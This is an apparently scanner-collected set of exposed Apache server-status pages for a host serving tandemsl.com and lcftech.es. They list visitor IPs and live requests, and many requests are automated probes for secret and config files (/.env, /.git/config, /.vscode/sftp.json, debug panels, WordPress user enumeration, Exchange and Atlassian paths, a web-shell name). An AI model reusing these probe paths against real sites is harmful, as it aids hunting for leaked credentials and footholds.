161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-172219540/981/2928_ 33.191614268670.022.4958.94 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694573011.00728511810302734375 0-172219540/825/2775_ 33.21003539940.014.8571.86 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-172219540/801/2779_ 33.21004485060.015.4957.07 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-172219540/883/2781_ 33.05023918630.013.6044.12 74.125.151.164http/1.1 0-172219540/982/3115_ 33.21005427020.017.2479.02 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-172219540/875/2669_ 33.08023511960.011.2641.20 161.35.155.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172219570/741/6773_ 29.53116901030.010.01169.93 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-172219570/718/7086_ 29.4413166040970.014.07143.06 74.125.151.162http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172219570/827/6938_ 29.5275506758560.021.15166.15 72.14.201.208h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172219570/640/7222_ 29.39106929290.08.20130.62 161.35.155.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-172219570/676/6584_ 29.40607140420.012.21135.07 74.125.151.164http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172219570/677/7349_ 29.391606548360.013.90133.00 74.125.151.162http/1.1 1-172219570/685/7280_ 29.4271587280390.014.90145.33 54.218.191.103http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 1-172219570/711/7306_ 29.51716946970.015.83176.13 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694573019.99637508392333984375 1-172219570/622/6911_ 29.5113186357770.09.79149.71 161.35.155.246http/1.1 1-172219570/607/7371_ 29.406111100410.010.19165.15 66.249.89.129http/1.1lcftech.es:443GET /wp-content/plugins/elementor-pro/assets/js/form.847b51cf47 2-172219550/52/3165_ 16.521744245980.00.4661.54 74.125.151.162http/1.1tandemsl.com:443GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.0 HTTP/1.1 2-172219550/111/3123_ 16.531403548590.01.5469.23 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/contact-form-7/includes/css/styles.css? 2-172219550/106/3527_ 16.531303660000.03.2263.92 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/table-of-contents-plus/screen.min.css?v 2-172219550/90/3722_ 16.51014573710.00.7576.36 161.35.155.246http/1.1 2-172219550/95/3432_ 16.51104480260.01.8388.49 161.35.155.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/121/3230_ 16.51005268210.01.9353.56 161.35.155.246http/1.1 2-172219550/128/3127_ 16.531684360590.01.5564.34 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.c 2-172219550/71/2950_ 16.51733403810.01.7552.52 74.125.151.162http/1.1 2-172219550/82/3133_ 16.531114481030.03.7878.01 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/uploads/elementor/css/post-11.css?ver=169052539 2-172219550/125/3146_ 16.531504389960.04.1959.75 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/themes/metro-pro/js/responsive-menu.js?ver=1.0. 3-172219560/191/5051_ 16.84006143400.04.70131.73 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicon 3-172219560/156/5038_ 16.91004735540.02.0288.12 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-172219560/122/5196_ 16.91006474460.01.15142.57 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-172219560/191/5688_ 16.91005747680.02.54135.79 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-172219560/212/5076_ 16.83005394250.01.97152.62 161.35.155.246http/1.1 3-172219560/185/5488_ 16.834506477980.02.36127.71 74.125.151.162http/1.1tandemsl.com:443GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver= 3-172219560/225/4648_ 16.894516439800.05.94118.25 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694572982.11205410957336425781 3-172219560/166/5014_ 16.84016396150.05.71122.25 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfo 3-172219560/173/5076_ 16.84015732420.02.0198.68 74.125.151.162http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery. 3-172219560/162/5206_ 16.8315005078050.01.78109.22 74.125.151.162http/1.1 4-172220860/125/12500_ 13.80196113762380.02.29286.23 201.221.176.125h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-172220860/116/13492_ 15.6028212752620.01.91243.75 74.125.151.163http/1.1tandemsl.com:443GET /wp-content/themes/metro-pro/style.css?ver=2.1.1 HTTP/1.1 4-172220860/116/12710_ 15.5319349013954600.01.42328.94 94.45.6.108http/1.1tandemsl.com:443GET /alfa-rex.php7 HTTP/1.1 4-172220860/105/13303_ 15.5219616113881240.01.14338.07 164.90.237.202http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 4-172220860/91/13155_ 13.50247812146700.01.04252.64 74.125.151.163http/1.1 4-172220860/100/12587_ 15.5930013488920.01.43338.91 74.125.151.163http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/css/frontend-legacy.mi 4-172220860/88/13558_ 13.80195013124940.01.58319.05 68.178.165.20http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8aa92852f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 10-Sep-2023 18:58:21 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 3 days 7 hours 8 minutes 18 seconds Server load: 0.08 0.06 0.03 Total accesses: 164455 - Total Traffic: 3.3 GB - Total Duration: 14810656 CPU Usage: u7.28 s12.03 cu518.48 cs369.25 - .318% CPU load .577 requests/sec - 12.2 kB/second - 21.2 kB/request - 90.059 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0139856no0yes010000 1139859no0yes010000 2139857no3yes19003 3139858no0yes010000 4139988no0yes010000 Sum503 149003 _____________________W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-111398560/3/1395_ 0.02001029760.00.0128.96 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-111398560/0/1328_ 0.00101161290.00.0024.47 165.22.108.223http/1.1 0-111398560/0/1597_ 0.00001220750.00.0040.86 74.213.83.249h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-111398560/0/1493_ 0.00011062600.00.0029.28 143.198.72.96http/1.1 0-111398560/1/1405_ 0.0200992460.00.0027.24 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-111398560/2/1288_ 0.02001151720.00.0035.93 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-111398560/1/1235_ 0.02001181170.00.0030.95 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-111398560/1/1231_ 0.01201091720.00.0018.88 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-111398560/1/1412_ 0.02101085570.00.0042.87 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-111398560/1/1259_ 0.0214051107580.00.0323.30 66.249.70.162http/1.1tandemsl.com:443GET /equipos/ HTTP/1.1 1-111398590/1/5541_ 0.02104928920.00.00150.23 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-111398590/1/5602_ 0.00404687160.00.00110.90 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-111398590/1/5547_ 0.02305054260.00.00126.41 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-111398590/0/5959_ 0.0043815164330.00.00110.26 66.249.70.164http/1.1tandemsl.com:443GET /seguridad-de-producto/fumigacion-de-palets/ HTTP/1.1 1-111398590/0/5240_ 0.00125103010.00.00108.59 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-111398590/1/5970_ 0.02304939010.00.00108.04 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-111398590/1/5967_ 0.02105428150.00.00113.58 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-111398590/2/6013_ 0.02305405890.00.00152.11 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-111398590/0/5791_ 0.00124690490.00.00125.99 143.198.72.96http/1.1 1-111398590/0/6126_ 0.0031608136490.00.00140.46 165.22.108.223http/1.1 2-111398570/2/1251_ 0.0220934380.00.0316.02 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-111398570/2/1197W 0.0300824660.00.0114.66 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-111398570/0/1228_ 0.0030976250.00.0016.84 34.216.242.54http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/HGSSKITWKfEMYEpxyoH6hzYGJS6wCEu 2-111398570/1/1397_ 0.0320914620.00.0125.79 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-111398570/1/1355_ 0.03101108530.00.0027.36 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-111398570/1/1058_ 0.0310966580.00.0015.44 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-111398570/2/1156_ 0.03101253840.00.0023.99 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 2-111398570/1/1014_ 0.0310856410.00.0020.42 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-111398570/2/1136_ 0.0300922800.00.0017.23 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-111398570/3/1108_ 0.0300805000.00.0017.83 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-111398580/3/1180_ 0.0310945230.00.1019.48 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-111398580/3/957_ 0.0300980230.00.0014.50 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-111398580/2/1026_ 0.03211361770.00.0124.29 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/1/1142_ 0.01021351390.00.0124.79 154.28.229.112http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/2/980_ 0.0321847670.00.0116.70 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/1/939_ 0.02201085350.00.0016.61 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/0/903_ 0.00221051060.00.0013.31 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-111398580/2/1153_ 0.0320963390.00.0020.01 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 3-111398580/1/1009_ 0.0320823410.00.0113.96 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-111398580/1/1147_ 0.0220954460.00.0014.44 143.198.72.96http/1.1 4-111399880/1/6823_ 0.01316874240.00.01155.23 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-111399880/1/7486_ 0.01205972190.00.00129.86 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-111399880/1/6787_ 0.03206003870.00.00149.02 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-111399880/1/7296_ 0.03106570590.00.00174.07 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-111399880/2/7356_ 0.03205882600.00.00120.13 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 4-111399880/1/7087_ 0.03106530710.00.00172.91 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-111399880/1/7225_ 0.03006681200.00.00178.92 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8c5dd6b01
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Jul-2023 05:02:56 CEST Restart Time: Wednesday, 28-Jun-2023 18:59:25 CEST Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 13 days 10 hours 3 minutes 30 seconds Server load: 0.08 0.04 0.01 Total accesses: 528587 - Total Traffic: 10.8 GB - Total Duration: 60499322 CPU Usage: u29.07 s46.59 cu2283.58 cs1428.87 - .327% CPU load .456 requests/sec - 9.7 kB/second - 21.3 kB/request - 114.455 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0647907no0yes010000 1647804no0yes010000 2647806no0yes19000 3647805no0yes010000 4647939no0yes010000 Sum500 149000 ___________________________W______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-216479070/2/16283_ 0.020118957840.00.01365.54 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-216479070/2/16904_ 0.020017929540.00.00370.89 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-216479070/1/16862_ 0.020018025670.00.00405.36 134.122.89.242http/1.1 0-216479070/1/16706_ 0.020017280670.00.00363.35 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-216479070/0/17619_ 0.000018395160.00.00411.51 23.178.112.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/uXvPwj2J6pRsjTxmnxBaiIbiRmREZC4 0-216479070/2/17670_ 0.020017366860.00.01394.62 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-216479070/1/17372_ 0.020017392230.00.00370.48 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-216479070/2/17191_ 0.020017082740.00.00419.62 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-216479070/0/16895_ 0.00017517543460.00.00390.05 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-216479070/2/16487_ 0.020019051440.00.00376.11 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-216478040/1/4627_ 0.02005224960.00.0080.86 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-216478040/1/3923_ 0.02005467410.00.0090.70 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-216478040/1/4206_ 0.01006130620.00.0073.57 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-216478040/1/4212_ 0.02014819060.00.0178.47 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-216478040/2/4381_ 0.02005915890.00.0085.22 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-216478040/1/4783_ 0.01025784870.00.0183.63 165.227.146.2http/1.1 1-216478040/1/4508_ 0.02005594330.00.0083.53 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-216478040/1/4488_ 0.01005273120.00.0080.38 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-216478040/1/4253_ 0.02005174480.00.0090.16 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-216478040/1/4285_ 0.01005094330.00.0093.03 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-216478060/1/14159_ 0.010013680400.00.00275.36 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-216478060/2/14367_ 0.010014813040.00.01296.67 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-216478060/1/14649_ 0.020014630610.00.00284.88 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-216478060/1/14857_ 0.010016307440.00.00281.59 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-216478060/0/15038_ 0.0002314049380.00.00300.54 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216478060/0/15247_ 0.000013893730.00.00275.20 172.68.80.71http/1.1 2-216478060/1/14520_ 0.020015198260.00.00289.74 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-216478060/1/13596W 0.010014244550.00.00253.03 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-216478060/0/14275_ 0.00012513971540.00.00285.67 134.122.89.242http/1.1 2-216478060/2/14511_ 0.020030400670.00.00293.69 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-216478050/0/10000_ 0.000010048850.00.00194.78 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10294_ 0.010010624610.00.00196.75 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10330_ 0.010010579270.00.00175.03 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-216478050/1/10371_ 0.020010987250.00.00181.81 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-216478050/0/10403_ 0.000110701650.00.00179.32 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/9730_ 0.010011109870.00.00178.12 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-216478050/0/10071_ 0.000410484530.00.00198.70 172.70.152.70http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/0/10009_ 0.00009942490.00.00188.36 190.11.87.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216478050/0/11186_ 0.00018212319360.00.00244.40 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10115_ 0.010010234130.00.00188.21 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-216479390/2/6656_ 0.020010172220.00.01136.39 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-216479390/2/6729_ 0.030010086360.00.00166.83 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-216479390/1/6926_ 0.03009600870.00.01154.20 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-216479390/1/6469_ 0.030011340580.00.00155.23 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-216479390/2/6919_ 0.02009524780.00.00155.73 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-216479390/1/6759_ 0.030011107810.00.00148.25 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-216479390/1/6501_ 0.030010398800.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc868c060e4
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 12-May-2023 22:50:02 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 79 Parent Server MPM Generation: 78 Server uptime: 125 days 2 hours 53 minutes 21 seconds Server load: 0.00 0.02 0.00 Total accesses: 6721101 - Total Traffic: 127.2 GB - Total Duration: 1106707755 CPU Usage: u284.99 s451.44 cu22076.7 cs14685.5 - .347% CPU load .622 requests/sec - 12.3 kB/second - 19.8 kB/request - 164.662 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03698276no1yes010000 13698405no0yes010000 23698273no0yes010000 33698275no7yes19015 43698274no0yes010000 Sum508 149015 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7836982760/1/131935_ 0.0710182723690.00.002344.93 190.30.78.116h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 0-7836982760/8/130210_ 0.1330188653780.00.232474.82 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 0-7836982760/6/129636_ 0.1300217877990.00.052491.45 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-7836982760/21/127510_ 0.1210183331660.00.192486.17 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-7836982760/5/126821_ 0.1300272274730.00.012413.23 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-7836982760/7/127227_ 0.1220168449660.00.012356.90 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-7836982760/9/130153_ 0.1200194890550.00.032409.08 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-7836982760/3/130733_ 0.1210195279140.00.002510.15 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-7836982760/3/129225_ 0.0800377980760.00.012418.30 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7836982760/2/127180_ 0.1311210322340.00.012397.47 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-7836984050/3/123718_ 0.0711317872200.00.012550.43 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-7836984050/1/124158_ 0.0810279178420.00.002471.34 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-7836984050/2/124640_ 0.0800231163830.00.012635.49 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-7836984050/3/123204_ 0.0700214882670.00.012516.15 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-7836984050/2/123251_ 0.0730168361640.00.002619.08 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-7836984050/2/124487_ 0.053133197139900.00.012438.06 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7836984050/1/124578_ 0.0730269165770.00.002551.70 142.93.64.15http/1.1 1-7836984050/0/124200_ 0.0030194380620.00.002399.40 167.172.232.142http/1.1 1-7836984050/2/125528_ 0.0720196394600.00.012518.22 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-7836984050/2/126363_ 0.0720235843530.00.002577.03 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-7836982730/0/140892_ 0.0020231386960.00.002821.82 142.93.64.15http/1.1 2-7836982730/1/142813_ 0.0621225608910.00.002832.57 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-7836982730/0/139713_ 0.0010244033870.00.002855.06 190.63.189.66h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/1/140114_ 0.0420244373350.00.002667.51 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-7836982730/1/141983_ 0.0420210167890.00.002789.45 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/1/141654_ 0.0620231828400.00.002725.18 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-7836982730/0/139318_ 0.0020191523370.00.002709.81 186.22.54.7h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/3/140555_ 0.0610203306170.00.002902.70 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-7836982730/3/139704_ 0.0610227757300.00.012844.66 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-7836982730/1/137637_ 0.0610195542060.00.002948.85 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-7836982750/5/143928_ 0.0800220863340.00.092714.66 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-7836982750/2/143006_ 0.0800217019510.00.002726.65 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 3-7836982750/2/144885_ 0.0801202564900.00.012882.44 